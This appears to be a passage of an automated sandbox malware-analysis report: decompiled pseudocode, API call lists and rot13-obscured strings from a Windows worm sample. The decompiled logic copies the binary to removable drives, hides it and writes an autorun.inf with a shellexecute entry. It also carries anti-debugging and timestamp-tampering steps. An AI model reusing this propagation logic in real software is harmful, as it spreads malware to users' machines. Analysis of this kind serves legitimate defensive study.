							Sleep(??);
							_t109 = _t107 - 4;
							_t60 = E0040402C(_t92);
							__eflags = _t60;
							if(_t60 == 0) {
								 *_t109 =  &_v588;
								LoadLibraryA(??);
								_t109 = _t109 - 4;
							}
							_v992 = "hfonpgvi";
							_t93 =  &_v940;
							 *_t109 = _t93;
							E00404C38();
							_v992 = _t93;
							 *_t109 =  &_v748;
							_t63 = E00404812(_t93);
							_v944 = _t63;
							__eflags = _t63 - 1;
							if(_t63 == 1) {
								E00406A0A();
							}
							E00407C4E(_t97);
							L18:
							 *_t109 = 0xfa0;
							Sleep(??);
							_t109 = _t109 - 4;
							goto L18;
						}
						E00405DC4(0);
						 *_t107 = _t91;
						E00405D46(_t91, 0);
						E00403C44(_t91, _t100, _t101);
						E004056D0(0);
						 *_t107 = _t91;
						E004054F2(0);
						_v992 = _t91;
						 *_t107 =  &_v908;
						E0040435C(_t91, _t97);
						 *_t107 = _t91;
						LoadLibraryA(??);
						 *(_t107 - 4) = 0xfa0;
						Sleep(??);
						_t97 = 0;
					}
				} else {
					E00405DC4(_t96); // executed
					 *_t107 = _t90; // executed
					E00405D46(_t90, _t96); // executed
					E00403C44(_t90, _t100, _t101); // executed
					E004056D0(_t96); // executed
					 *_t107 = _t90; // executed
					E004054F2(_t96); // executed
					_v992 = _t90;
					 *_t107 =  &_v908; // executed
					E0040435C(_t90, _t96); // executed
					 *_t107 = _t90; // executed
					LoadLibraryA(??); // executed
					_t112 = _t107 - 4;
					 *_t112 = 0xfa0; // executed
					Sleep(??); // executed
					_t113 = _t112 - 4;
					_v992 = "pgszra.rkr";
					 *_t113 = _t100;
					E00404C38();
					_v992 = 0;
					 *_t113 = _t100; // executed
					E00405776(_t90); // executed
					_t97 = 0;
				}
				return _t97;
			}

0x00404076
0x0040408a
0x0040408f
0x0040409a
0x0040409e
0x004040a5
0x004040aa
0x004040ad
0x004040b2
0x004040b4
0x004040b6
0x004040bd
0x004040bd
0x004040c2
0x004040c9
0x004040cb
0x004040d2
0x004040d2
0x004040d7
0x004040dd
0x004040e8
0x004040e8
0x004040ea
0x004040ef
0x004040f7
0x00404105
0x00404108
0x0040410d
0x00404115
0x0040411b
0x0040411e
0x00404123
0x00404127
0x0040412f
0x00404135
0x00404138
0x0040413d
0x00404140
0x00404145
0x00404147
0x0040414e
0x004041c5
0x004041ca
0x004041cf
0x004041d1
0x004041d7
0x004041dd
0x004041e0
0x004041e5
0x004041e7
0x0040423e
0x00404240
0x00404248
0x0040424b
0x00404250
0x00404250
0x00404253
0x0040425b
0x00404261
0x00404264
0x00404269
0x00404271
0x00404277
0x0040427a
0x0040427f
0x00404283
0x00404286
0x0040428b
0x00404291
0x00404294
0x0040429c
0x004042a0
0x004042a8
0x004042b0
0x004042b8
0x004042c0
0x004042c7
0x004042cc
0x004042cc
0x004042cf
0x004042d6
0x004042db
0x004042e2
0x004042e7
0x004042ea
0x004042ef
0x004042f1
0x004042f9
0x004042fc
0x00404301
0x00404301
0x00404304
0x0040430c
0x00404312
0x00404315
0x0040431a
0x00404324
0x00404327
0x0040432c
0x00404332
0x00404335
0x00404337
0x00404337
0x0040433c
0x00404341
0x00404341
0x00404348
0x0040434d
0x00000000
0x0040434d
0x004041e9
0x004041ee
0x004041f1
0x004041f6
0x004041fb
0x00404200
0x00404203
0x00404208
0x00404212
0x00404215
0x0040421a
0x0040421d
0x00404225
0x0040422c
0x00404234
0x00404234
0x00404150
0x00404150
0x00404155
0x00404158
0x0040415d
0x00404162
0x00404167
0x0040416a
0x0040416f
0x00404179
0x0040417c
0x00404181
0x00404184
0x00404189
0x0040418c
0x00404193
0x00404198
0x0040419b
0x004041a3
0x004041a6
0x004041ab
0x004041b3
0x004041b6
0x004041bb
0x004041bb
0x0040435b

APIs

WSAStartup.WS2_32 ref: 004040A5

Part of subcall function 00404AB8: IsDebuggerPresent.KERNEL32(004040B2), ref: 00404AC1

ExitProcess.KERNEL32 ref: 004040BD

Part of subcall function 00403E2E: CreateMutexA.KERNEL32 ref: 00403E5B
Part of subcall function 00403E2E: GetLastError.KERNEL32 ref: 00403E63

Part of subcall function 00404ED6: fopen.MSVCRT ref: 00404EEA
Part of subcall function 00404ED6: fclose.MSVCRT ref: 00404EFB

ExitProcess.KERNEL32 ref: 004040D2
LoadLibraryA.KERNEL32 ref: 00404184
Sleep.KERNEL32 ref: 00404193
LoadLibraryA.KERNEL32 ref: 0040421D
Sleep.KERNEL32 ref: 0040422C
LoadLibraryA.KERNEL32 ref: 0040424B
CreateThread.KERNEL32 ref: 004042C7
Sleep.KERNEL32 ref: 004042E2
LoadLibraryA.KERNEL32 ref: 004042FC
Sleep.KERNEL32 ref: 00404348

Part of subcall function 00405DC4: CreateFileA.KERNEL32 ref: 00405E5E
Part of subcall function 00405DC4: ExitProcess.KERNEL32 ref: 00405E7E
Part of subcall function 00405DC4: CloseHandle.KERNEL32 ref: 00405E9E

Part of subcall function 00405D46: CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004041F6), ref: 00405D83
Part of subcall function 00405D46: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004041F6), ref: 00405DB7

Part of subcall function 004056D0: GetModuleFileNameA.KERNEL32 ref: 004056F4
Part of subcall function 004056D0: CopyFileA.KERNEL32 ref: 0040573B

Part of subcall function 004054F2: CreateFileA.KERNEL32 ref: 00405531
Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 00405574
Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 0040559A
Part of subcall function 004054F2: Sleep.KERNEL32 ref: 004055A9
Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 004055D4
Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 004055FA
Part of subcall function 004054F2: Sleep.KERNEL32 ref: 00405609
Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 00405634
Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 0040565A
Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 0040567D
Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 004056AF
Part of subcall function 004054F2: CloseHandle.KERNEL32 ref: 004056C0

Part of subcall function 0040435C: CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404399
Part of subcall function 0040435C: GetFileTime.KERNEL32 ref: 004043CD
Part of subcall function 0040435C: CloseHandle.KERNEL32 ref: 004043E5
Part of subcall function 0040435C: CreateFileA.KERNEL32 ref: 00404423
Part of subcall function 0040435C: SetFileTime.KERNEL32 ref: 00404453
Part of subcall function 0040435C: CloseHandle.KERNEL32 ref: 00404467

Strings

fureinaf.qyy, xrefs: 0040410D
Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\ihyaiby32\Irefvba, xrefs: 00404253
SeDebugPrivilege, xrefs: 004042CF
fgngrz, xrefs: 00404269
hfonpgvi, xrefs: 00404304
user32.dll, xrefs: 004040EF
pgszra.rkr, xrefs: 0040419B

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: File$Create$Sleep$CloseHandle$LibraryLoadPointerWrite$ExitProcess$Time$CopyDebuggerErrorLastModuleMutexNamePresentStartupThreadfclosefopen
String ID: Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\ihyaiby32\Irefvba$SeDebugPrivilege$fgngrz$fureinaf.qyy$hfonpgvi$pgszra.rkr$user32.dll
API String ID: 2057360409-330933156
Opcode ID: 199cad912980a4fc92ecc50461b3e6f79d7811f6d2aad3494388b950cac20798
Instruction ID: 0cfcdf05f74210d9808c357536bce9e529f0bcd84bc5eb1993387659449c0d65
Opcode Fuzzy Hash: 199cad912980a4fc92ecc50461b3e6f79d7811f6d2aad3494388b950cac20798
Instruction Fuzzy Hash: 67610EB09087048AD710BF75C58625EBAE4AF81308F41997FE9C4776C2DB7C96888F5B

Uniqueness

Uniqueness Score: -1.00%

Function 10002CEF Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 100
stringsleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E10002CEF(signed int __edx) {
				void* _v16;
				char _v188;
				char _v316;
				char _v348;
				char _v508;
				char _v509;
				void _v604;
				void* _v612;
				int _v616;
				void* _v620;
				void* __ebx;
				signed int _t44;
				void* _t50;
				int _t52;
				CHAR* _t54;
				signed int _t62;
				signed int _t63;
				int _t65;
				void* _t66;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void** _t72;
				intOrPtr* _t73;
				void** _t74;

				_t63 = __edx;
				memcpy( &_v604, 0x10004000, 0x60);
				E10001F26( &_v316, "Fbsgjner\\Zvpebfbsg\\Jvaqbjf\\PheeragIrefvba\\Rkcybere\\ihyaiby32\\Irefvba");
				E10001F26( &_v348, "hfonpgvi");
				_t44 = E10002B9C( &_v348,  &_v316,  &_v348); // executed
				_t65 = 0;
				if(((_t44 & 0xffffff00 | _t44 == 0x00000042 | _t63 & 0xffffff00 | _t44 == 0x00000000) & 0x00000001) == 0) {
					_v616 = "tepbcl.qyy";
					_v620 =  &_v348;
					E10001F26();
					E10002209( &_v188, 0x96,  &_v348);
					_t50 = E1000271B( &_v188);
					_t65 = 0;
					if(_t50 != 0) {
						_t66 =  &_v508;
						while(1) {
							Sleep(0x2328);
							_t71 = _t70 - 4;
							_t62 = 0;
							do {
								_t52 = GetDriveTypeA( *(_t69 + _t62 * 4 - 0x258));
								_t71 = _t71 - 4;
								if(_t52 == 2) {
									_t68 =  &_v508;
									memset(_t68, 0, 0x96);
									_t54 =  *(_t69 + _t62 * 4 - 0x258);
									_v616 = _t54;
									_v620 = _t68;
									L100034B8();
									_v620 = _t68;
									L10003570();
									_t72 = _t71 - 4;
									if(_t54[(char*)( &_v509)] != 0x5c) {
										_v620 = 0x1000508e;
										 *_t72 = _t68;
										L10003578();
										_t72 = _t72 - 8;
									}
									_v620 = 0x100060a4;
									 *_t72 = _t66;
									L100034B8();
									 *_t72 = 1;
									SetErrorMode(??);
									_t73 = _t72 - 4;
									_v616 = 0;
									_v620 = _t66;
									 *_t73 =  &_v188;
									CopyFileA(??, ??, ??);
									_t74 = _t73 - 0xc;
									_v620 = 2;
									 *_t74 = _t66;
									SetFileAttributesA(??, ??);
									_t71 = _t74 - 8;
								}
								_t62 = 1 + _t62;
							} while (_t62 <= 0x17);
						}
					}
				}
				return _t65;
			}

0x10002cef
0x10002d14
0x10002d2a
0x10002d40
0x10002d4c
0x10002d5e
0x10002d65
0x10002d6b
0x10002d79
0x10002d7c
0x10002d96
0x10002d9e
0x10002da3
0x10002daa
0x10002db0
0x10002db6
0x10002dbd
0x10002dc2
0x10002dc5
0x10002dca
0x10002dd4
0x10002dd9
0x10002ddf
0x10002de5
0x10002dfe
0x10002e03
0x10002e0a
0x10002e0e
0x10002e11
0x10002e16
0x10002e19
0x10002e1e
0x10002e29
0x10002e2b
0x10002e33
0x10002e36
0x10002e3b
0x10002e3b
0x10002e3e
0x10002e46
0x10002e49
0x10002e4e
0x10002e55
0x10002e5a
0x10002e5d
0x10002e65
0x10002e6f
0x10002e72
0x10002e77
0x10002e7a
0x10002e82
0x10002e85
0x10002e8a
0x10002e8a
0x10002e8d
0x10002e8e
0x10002e97
0x10002db6
0x10002daa
0x10002ea5

APIs

memcpy.MSVCRT ref: 10002D14
rot13.SHERVANS ref: 10002D2A

Part of subcall function 10001F26: rot13c.SHERVANS ref: 10001F40

rot13.SHERVANS ref: 10002D40
get_dword.SHERVANS ref: 10002D4C

Part of subcall function 10002B9C: RegOpenKeyExA.ADVAPI32 ref: 10002BD6
Part of subcall function 10002B9C: RegOpenKeyExA.ADVAPI32 ref: 10002C04
Part of subcall function 10002B9C: RegQueryValueExA.ADVAPI32 ref: 10002C3F
Part of subcall function 10002B9C: RegCloseKey.ADVAPI32 ref: 10002C4F

rot13.SHERVANS ref: 10002D7C
add_system_direcroty.SHERVANS ref: 10002D96

Part of subcall function 10002209: memset.MSVCRT ref: 10002226
Part of subcall function 10002209: GetSystemDirectoryA.KERNEL32 ref: 10002232
Part of subcall function 10002209: lstrlen.KERNEL32 ref: 1000223D
Part of subcall function 10002209: lstrcat.KERNEL32 ref: 10002257
Part of subcall function 10002209: lstrcat.KERNEL32 ref: 10002269

filetyt.SHERVANS ref: 10002D9E

Part of subcall function 1000271B: fopen.MSVCRT ref: 1000272F
Part of subcall function 1000271B: fclose.MSVCRT ref: 10002740

Sleep.KERNEL32 ref: 10002DBD
GetDriveTypeA.KERNEL32 ref: 10002DD4
memset.MSVCRT ref: 10002DFE
_mbscat.MSVCRT ref: 10002E11
lstrlen.KERNEL32 ref: 10002E19
lstrcat.KERNEL32 ref: 10002E36
_mbscat.MSVCRT ref: 10002E49
SetErrorMode.KERNEL32 ref: 10002E55
CopyFileA.KERNEL32 ref: 10002E72
SetFileAttributesA.KERNEL32 ref: 10002E85

Strings

`, xrefs: 10002D01
Q, xrefs: 10002D6B

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: lstrcatrot13$FileOpen_mbscatlstrlenmemset$AttributesCloseCopyDirectoryDriveErrorModeQuerySleepSystemTypeValueadd_system_direcrotyfclosefiletytfopenget_dwordmemcpyrot13c
String ID: `$Q
API String ID: 1565552690-2154725097
Opcode ID: 1c32a01f9ab9ac1369742c2c789e237e671a51ecb16a1e113751e94dc0ba8593
Instruction ID: 3c753f9fe4a5df1170e053b3461346bedc4f7c817325d12f88918a50ebfe7554
Opcode Fuzzy Hash: 1c32a01f9ab9ac1369742c2c789e237e671a51ecb16a1e113751e94dc0ba8593
Instruction Fuzzy Hash: D84182B4408B459BE711EF24D98539FBBF4EF80381F41882DE8C857209D779A988CB83

Uniqueness

Uniqueness Score: -1.00%

Function 0040B0E0 Relevance: 26.4, APIs: 6, Strings: 9, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E0040B0E0(void* __eax) {
				void* _v16;
				short _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				char _v108;
				short _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				char _v188;
				int _v192;
				void* __ebx;
				char _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				void* _t65;
				intOrPtr _t71;
				intOrPtr _t73;
				signed char _t75;
				char _t78;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				intOrPtr _t83;
				intOrPtr _t84;
				intOrPtr _t85;
				signed short _t88;
				void* _t90;
				void* _t92;
				signed int _t93;
				signed int _t94;
				void* _t96;
				signed int _t101;
				intOrPtr _t103;
				intOrPtr _t104;
				void* _t105;
				signed int _t106;
				signed int _t109;
				signed int _t110;
				signed int* _t111;
				intOrPtr* _t112;
				intOrPtr* _t114;
				signed int* _t115;

				_t94 =  *0x418284;
				if(_t94 == 0) {
					_v108 = 0x41414141;
					_t51 = "-LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32"; // 0x42494c2d
					_t110 =  &_v108;
					_v104 = 0x41414141;
					_v100 = 0x41414141;
					_v76 = _t51;
					_t52 = M004131B4; // 0x57434347
					_v96 = 0x41414141;
					_v92 = 0x41414141;
					_v72 = _t52;
					_t53 = M004131B8; // 0x452d3233
					_v88 = 0x41414141;
					_v84 = 0x41414141;
					_v68 = _t53;
					_t54 = M004131BC; // 0x2d322d48
					_v80 = 0x41414141;
					_v64 = _t54;
					_t55 = M004131C0; // 0x4a4c4a53
					_v60 = _t55;
					_t56 = M004131C4; // 0x4854472d
					_v56 = _t56;
					_t57 = M004131C8; // 0x494d2d52
					_v52 = _t57;
					_t58 =  *0x4131cc; // 0x3357474e
					_v48 = _t58;
					_v44 =  *0x4131d0 & 0x0000ffff;
					 *_t111 = _t110;
					_t61 = FindAtomA(??) & 0x0000ffff;
					_t112 = _t111 - 4;
					_v192 = _t61;
					if(_t61 != 0) {
						L10:
						_t93 = E0040B040(_t61, _t92);
					} else {
						 *_t112 = 0x3c;
						_t65 = malloc(??);
						_t93 = _t65;
						if(_t65 == 0) {
							abort();
							0;
							0;
							_push(_t94);
							_t96 = _t112 + 8;
							while(_t65 >= 0x1000) {
								_t96 = _t96 - 0x1000;
								_t65 = _t65 - 0x1000;
							}
							goto __eax;
						}
						asm("cld");
						memset(_t65, _v192, 0xf << 2);
						_t114 = _t112 + 0xc;
						 *((intOrPtr*)(_t93 + 4)) = L0040C278;
						_t101 = 1;
						 *((intOrPtr*)(_t93 + 8)) = E0040B030;
						 *_t93 = 0x3c;
						 *((intOrPtr*)(_t93 + 0x28)) = 0;
						 *((intOrPtr*)(_t93 + 0x14)) =  *0x418254;
						_t71 =  *0x40d4f0; // 0x0
						 *((intOrPtr*)(_t93 + 0x18)) =  *0x418258;
						_t103 =  *0x40d4f4; // 0xffffffff
						 *((intOrPtr*)(_t93 + 0x1c)) = _t71;
						 *((intOrPtr*)(_t93 + 0x20)) = _t103;
						 *((intOrPtr*)(_t93 + 0x30)) = 0xffffffff;
						 *((intOrPtr*)(_t93 + 0x2c)) =  *0x418264;
						_t104 =  *0x40d4fc; // 0xffffffff
						_t73 =  *0x40d4f8; // 0x0
						 *((intOrPtr*)(_t93 + 0x38)) = _t104;
						_t105 = 0x1f;
						 *((intOrPtr*)(_t93 + 0x34)) = _t73;
						do {
							_t75 = _t93 & _t101;
							asm("sbb eax, eax");
							_t101 = _t101 + _t101;
							 *((char*)(_t105 +  &_v188)) = (_t75 & 0x00000020) + 0x41;
							_t105 = _t105 - 1;
						} while (_t105 >= 0);
						_t78 = "-LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32"; // 0x42494c2d
						_v156 = _t78;
						_t79 = M004131B4; // 0x57434347
						_v152 = _t79;
						_t80 = M004131B8; // 0x452d3233
						_v148 = _t80;
						_t81 = M004131BC; // 0x2d322d48
						_v144 = _t81;
						_t82 = M004131C0; // 0x4a4c4a53
						_v140 = _t82;
						_t83 = M004131C4; // 0x4854472d
						_v136 = _t83;
						_t84 = M004131C8; // 0x494d2d52
						_v132 = _t84;
						_t85 =  *0x4131cc; // 0x3357474e
						_v128 = _t85;
						_v124 =  *0x4131d0 & 0x0000ffff;
						 *_t114 =  &_v188; // executed
						_t88 = AddAtomA(??); // executed
						_t109 = _t88 & 0x0000ffff;
						_t115 = _t114 - 4;
						if(_t109 != 0) {
							_t90 = E0040B040(_t109, _t93);
							_t106 = _t109;
							if(_t90 != _t93) {
								goto L7;
							} else {
								goto L8;
							}
							goto L19;
						} else {
							L7:
							_t106 = 0;
						}
						L8:
						if(_t106 == 0) {
							 *_t115 = _t93;
							L0040C1C8();
							 *_t115 = _t110;
							_t61 = FindAtomA(??) & 0x0000ffff;
							goto L10;
						}
					}
					 *0x418284 = _t93;
					_t46 = _t93 + 4; // 0x4
					 *0x418274 = _t46;
					_t47 = _t93 + 8; // 0x8
					_t64 = _t47;
					 *0x418294 = _t64;
					return _t64;
				} else {
					return __eax;
				}
				L19:
			}

0x0040b0ec
0x0040b0f4
0x0040b0fe
0x0040b105
0x0040b10a
0x0040b10d
0x0040b114
0x0040b11b
0x0040b11e
0x0040b123
0x0040b12a
0x0040b131
0x0040b134
0x0040b139
0x0040b140
0x0040b147
0x0040b14a
0x0040b14f
0x0040b156
0x0040b159
0x0040b15e
0x0040b161
0x0040b166
0x0040b169
0x0040b16e
0x0040b171
0x0040b176
0x0040b180
0x0040b184
0x0040b18d
0x0040b190
0x0040b195
0x0040b19b
0x0040b2dc
0x0040b2e1
0x0040b1a1
0x0040b1a1
0x0040b1a8
0x0040b1af
0x0040b1b1
0x0040b310
0x0040b31b
0x0040b31f
0x0040b320
0x0040b323
0x0040b326
0x0040b32d
0x0040b336
0x0040b336
0x0040b34b
0x0040b34b
0x0040b1b7
0x0040b1c5
0x0040b1c5
0x0040b1c7
0x0040b1ce
0x0040b1d3
0x0040b1df
0x0040b1eb
0x0040b1f2
0x0040b1f5
0x0040b1fa
0x0040b1fd
0x0040b203
0x0040b20b
0x0040b20e
0x0040b215
0x0040b218
0x0040b21e
0x0040b223
0x0040b226
0x0040b22b
0x0040b230
0x0040b232
0x0040b237
0x0040b23b
0x0040b23f
0x0040b246
0x0040b246
0x0040b249
0x0040b24e
0x0040b254
0x0040b259
0x0040b25f
0x0040b264
0x0040b26a
0x0040b26f
0x0040b275
0x0040b27a
0x0040b280
0x0040b285
0x0040b28b
0x0040b290
0x0040b293
0x0040b298
0x0040b2a2
0x0040b2ac
0x0040b2af
0x0040b2b5
0x0040b2b8
0x0040b2bd
0x0040b303
0x0040b30a
0x0040b30c
0x00000000
0x0040b30e
0x00000000
0x0040b30e
0x00000000
0x0040b2bf
0x0040b2bf
0x0040b2bf
0x0040b2bf
0x0040b2c1
0x0040b2c3
0x0040b2c5
0x0040b2c8
0x0040b2cd
0x0040b2d9
0x00000000
0x0040b2d9
0x0040b2c3
0x0040b2e3
0x0040b2e9
0x0040b2ec
0x0040b2f1
0x0040b2f1
0x0040b2f4
0x0040b300
0x0040b0f6
0x0040b0fd
0x0040b0fd
0x00000000

APIs

FindAtomA.KERNEL32 ref: 0040B187
malloc.MSVCRT ref: 0040B1A8
AddAtomA.KERNEL32 ref: 0040B2AF

Strings

AAAA, xrefs: 0040B0FE
AAAA, xrefs: 0040B123
AAAA, xrefs: 0040B139
AAAA, xrefs: 0040B10D
AAAA, xrefs: 0040B114
AAAA, xrefs: 0040B140
AAAA, xrefs: 0040B12A
AAAA, xrefs: 0040B14F
-LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32, xrefs: 0040B105, 0040B249

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: Atom$Findmalloc
String ID: -LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32$AAAA$AAAA$AAAA$AAAA$AAAA$AAAA$AAAA$AAAA
API String ID: 822928543-4229226183
Opcode ID: b996283103914c8c547a0f5b047768b3d30837a48cc31e111859e5c4cfbbb589
Instruction ID: 5c8a408c4dcb306db70316dfdce650025cae950a5a82f7704b97cd34435e599e
Opcode Fuzzy Hash: b996283103914c8c547a0f5b047768b3d30837a48cc31e111859e5c4cfbbb589
Instruction Fuzzy Hash: DC6107B4A00218DFDB50CFA9E9C4699BBF0FB48311F1481BAD818EB395E7349945CF49

Uniqueness

Uniqueness Score: -1.00%

Function 10002806 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 98
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 24%

			E10002806(intOrPtr __ebx, signed int __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v188;
				char _v316;
				char _v364;
				char _v572;
				long _v576;
				void* _v588;
				void* _v592;
				void* _v596;
				void* _v600;
				void* _v604;
				void* _v608;
				void* _v612;
				char* _v616;
				void* _t46;
				int _t50;
				signed int _t52;
				void* _t63;
				void* _t64;
				void* _t66;
				signed int _t73;
				CHAR* _t76;
				void* _t82;
				void** _t83;

				_t73 = __edx;
				_v16 = __ebx;
				_v12 = __esi;
				_v8 = __edi;
				_v616 = "Fbsgjner\\Zvpebfbsg\\Jvaqbjf\\PheeragIrefvba\\Rkcybere\\ihyaiby32\\Irefvba";
				_t63 =  &_v316;
				 *_t83 = _t63;
				E10001F26();
				_v608 = 0x14;
				_v612 = 0x100060a4;
				_v616 = "namecp";
				 *_t83 = _t63; // executed
				_t46 = E10001F57(_t63); // executed
				if(_t46 == 0) {
					 *_t83 = 0x100060a4;
					E100024A2();
					asm("cld");
					asm("repne scasb");
					 *0x100060A3 = 0x6578652e;
					 *0x10BB3C54 = 0;
					_v612 = 0x100060a4;
					_v616 = "namecp";
					 *_t83 = _t63; // executed
					E1000274E(); // executed
				}
				_v616 = "fngbeanf.qyy";
				_t64 =  &_v364;
				 *_t83 = _t64;
				E10001F26();
				_v612 = _t64;
				_v616 = 0x96;
				 *_t83 =  &_v188;
				E10002209();
				_t76 =  &_v188;
				 *_t83 = _t76; // executed
				_t50 = E1000271B(); // executed
				if(_t50 == 0) {
					_v608 = 0x100060a4;
					_v612 = 0x100060a4;
					_v616 = "[autorun]\r\nshellexecute=%s\r\nicon=%%SystemRoot%%\\system32\\SHELL32.dll,4\r\naction=Open folder to view files\r\nshell\\default=Open\r\nshell\\default\\command=%s\r\nshell=default";
					_t82 =  &_v572;
					 *_t83 = _t82;
					wsprintfA(??, ??);
					_t52 = CreateFileA(_t76, 0x40000000, 0, 0, 2, 0x80, 0); // executed
					_t66 = _t52;
					_t50 = _t52 & 0xffffff00 | _t52 == 0xffffffff | _t73 & 0xffffff00 | _t66 == 0x00000000;
					if((_t50 & 0x00000001) == 0) {
						asm("cld");
						asm("repne scasb");
						WriteFile(_t66, _t82, 0xbadbac,  &_v576, 0); // executed
						CloseHandle(_t66);
						_t50 = SetFileAttributesA( &_v188, 2); // executed
					}
				}
				return _t50;
			}

0x10002806
0x1000280f
0x10002812
0x10002815
0x10002818
0x10002820
0x10002826
0x10002829
0x1000282e
0x10002836
0x1000283e
0x10002846
0x10002849
0x10002850
0x10002852
0x10002859
0x10002863
0x1000286b
0x10002870
0x1000287a
0x10002881
0x10002889
0x10002891
0x10002894
0x10002894
0x10002899
0x100028a1
0x100028a7
0x100028aa
0x100028af
0x100028b3
0x100028c1
0x100028c4
0x100028c9
0x100028cf
0x100028d2
0x100028d9
0x100028df
0x100028e7
0x100028ef
0x100028f7
0x100028fd
0x10002900
0x10002938
0x10002940
0x1000294d
0x10002951
0x10002953
0x1000295d
0x1000297f
0x1000298a
0x100029a3
0x100029a8
0x10002951
0x100029b7

APIs

rot13.SHERVANS ref: 10002829

Part of subcall function 10001F26: rot13c.SHERVANS ref: 10001F40

Get_Reg_SZ.SHERVANS ref: 10002849

Part of subcall function 10001F57: RegOpenKeyExA.ADVAPI32 ref: 10001F90
Part of subcall function 10001F57: RegOpenKeyExA.ADVAPI32 ref: 10001FBE
Part of subcall function 10001F57: RegQueryValueExA.ADVAPI32 ref: 10001FF9
Part of subcall function 10001F57: RegCloseKey.ADVAPI32 ref: 10002009

sss_rans.SHERVANS ref: 10002859

Part of subcall function 100024A2: GetLocalTime.KERNEL32 ref: 100024F9
Part of subcall function 100024A2: GetTickCount.KERNEL32 ref: 10002501
Part of subcall function 100024A2: srand.MSVCRT ref: 10002509
Part of subcall function 100024A2: rand.MSVCRT ref: 10002512
Part of subcall function 100024A2: GetTickCount.KERNEL32 ref: 10002519
Part of subcall function 100024A2: srand.MSVCRT ref: 10002521
Part of subcall function 100024A2: rand.MSVCRT ref: 1000252D
Part of subcall function 100024A2: GetTickCount.KERNEL32 ref: 10002546
Part of subcall function 100024A2: srand.MSVCRT ref: 1000254E
Part of subcall function 100024A2: rand.MSVCRT ref: 10002553
Part of subcall function 100024A2: GetTickCount.KERNEL32 ref: 1000256E
Part of subcall function 100024A2: srand.MSVCRT ref: 10002576
